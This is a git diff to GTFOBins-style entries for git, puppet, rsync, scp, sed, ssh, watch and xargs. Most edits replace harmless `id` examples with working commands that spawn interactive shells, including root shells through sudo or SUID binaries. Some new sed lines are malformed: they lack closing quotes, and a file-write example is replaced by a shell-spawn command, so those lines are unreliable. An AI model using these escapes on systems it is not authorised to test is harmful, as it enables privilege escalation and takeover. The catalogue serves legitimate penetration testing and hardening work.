diff --git a/_gtfobins/git.md b/_gtfobins/git.md index ac0095c..b6b82ad 100644 --- a/_gtfobins/git.md +++ b/_gtfobins/git.md @@ -1,15 +1,9 @@ --- functions: - execute-non-interactive: - - code: | - export PAGER=/usr/bin/id - git -p help + execute-interactive: + - code: PAGER='sh -c "exec sh 0<&1"' git -p help sudo-enabled: - - code: | - export PAGER=/usr/bin/id - sudo -E git -p help + - code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help suid-limited: - - code: | - export PAGER=/usr/bin/id - ./git -p help + - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help --- diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md index 55f3918..416f606 100644 --- a/_gtfobins/puppet.md +++ b/_gtfobins/puppet.md @@ -1,10 +1,8 @@ --- functions: - execute-non-interactive: - - description: The executed command output shown in the puppet log format. - code: | - export CMD="/usr/bin/id" - puppet apply -e "exec { '$CMD': logoutput => true }" + execute-interactive: + - code: | + puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" file-write: - description: The file path must be absolute. code: | @@ -16,8 +14,6 @@ functions: export LFILE=file_to_read puppet filebucket -l diff /dev/null $LFILE sudo-enabled: - - description: The executed command output shown in the puppet log format. - code: | - export CMD="/usr/bin/id" - sudo puppet apply -e "exec { '$CMD': logoutput => true }" + - code: | + sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }" --- diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md index 754d848..7a9d051 100644 --- a/_gtfobins/rsync.md +++ b/_gtfobins/rsync.md @@ -1,9 +1,9 @@ --- functions: execute-interactive: - - code: rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null + - code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null sudo-enabled: - - code: sudo rsync -e 'bash -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null + - code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null suid-enabled: - - code: ./rsync -e 'bash -p -c "exec 10<&0 11>&1 0<&2 1>&2; sh -i"' 127.0.0.1:/dev/null + - code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null --- diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md index 832fe00..eba6c8e 100644 --- a/_gtfobins/scp.md +++ b/_gtfobins/scp.md @@ -1,10 +1,9 @@ --- functions: - execute-non-interactive: + execute-interactive: - code: | TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" + echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" scp -S $TF x y: upload: @@ -22,15 +21,13 @@ functions: sudo-enabled: - code: | TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" + echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" sudo scp -S $TF x y: suid-limited: - code: | TF=$(mktemp) - CMD="id" - echo "$CMD" > "$TF" + echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" ./scp -S $TF a b: --- diff --git a/_gtfobins/sed.md b/_gtfobins/sed.md index be83f84..2560133 100644 --- a/_gtfobins/sed.md +++ b/_gtfobins/sed.md @@ -2,14 +2,14 @@ functions: execute-interactive: - description: GNU version only. Also, this requires `bash`. - code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + code: sed -n '1e exec sh 1>&0' /etc/hosts execute-non-interactive: - description: GNU version only. code: sed -n "1e id" /etc/hosts file-write: - code: | LFILE=file_to_write - sed -n "1s/.*/DATA/w $LFILE" /etc/hosts + sed -n '1e exec sh 1>&0 /etc/hosts file-read: - code: | LFILE=file_to_read @@ -20,5 +20,5 @@ functions: ./sed -e '' "$LFILE" sudo-enabled: - description: GNU version only. Also, this requires `bash`. - code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts + code: sudo sed -n '1e exec sh 1>&0 /etc/hosts --- diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index ffd196f..72a718e 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -4,7 +4,7 @@ functions: - description: Reconnecting may help bypassing restricted shells. code: ssh localhost $SHELL --noprofile --norc - description: Spawn interactive shell through ProxyCommand option. - code: ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x + code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x upload: - description: Send local file to a SSH server. code: | @@ -26,5 +26,5 @@ functions: ssh -F $LFILE localhost sudo-enabled: - description: Spawn interactive root shell through ProxyCommand option. - code: sudo ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x + code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x --- diff --git a/_gtfobins/watch.md b/_gtfobins/watch.md index 06b5fbb..d6bdc8e 100644 --- a/_gtfobins/watch.md +++ b/_gtfobins/watch.md @@ -1,12 +1,12 @@ --- functions: - execute-non-interactive: - - code: watch /usr/bin/id + execute-interactive: + - code: watch -x sh -c 'reset; exec sh 1>&0 2>&0' suid-enabled: - description: This keeps the SUID privileges only if the `-x` option is present. - code: ./watch -x /usr/bin/id + code: ./watch -x sh -c 'reset; exec sh 1>&0 2>&0' sudo-enabled: - - code: sudo watch /usr/bin/id + - code: sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0' suid-limited: - - code: ./watch /usr/bin/id + - code: ./watch 'reset; exec sh 1>&0 2>&0' --- diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md index 42ec684..0cfd581 100644 --- a/_gtfobins/xargs.md +++ b/_gtfobins/xargs.md @@ -3,6 +3,11 @@ functions: execute-interactive: - description: GNU version only. code: xargs -a /dev/null sh + - code: echo x | xargs -Iy sh -c 'exec sh 0<&1' + - description: Read interactively from `stdin`. + code: | + xargs -Ix sh -c 'exec sh 0<&1' + x^D^D file-read: - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only. code: |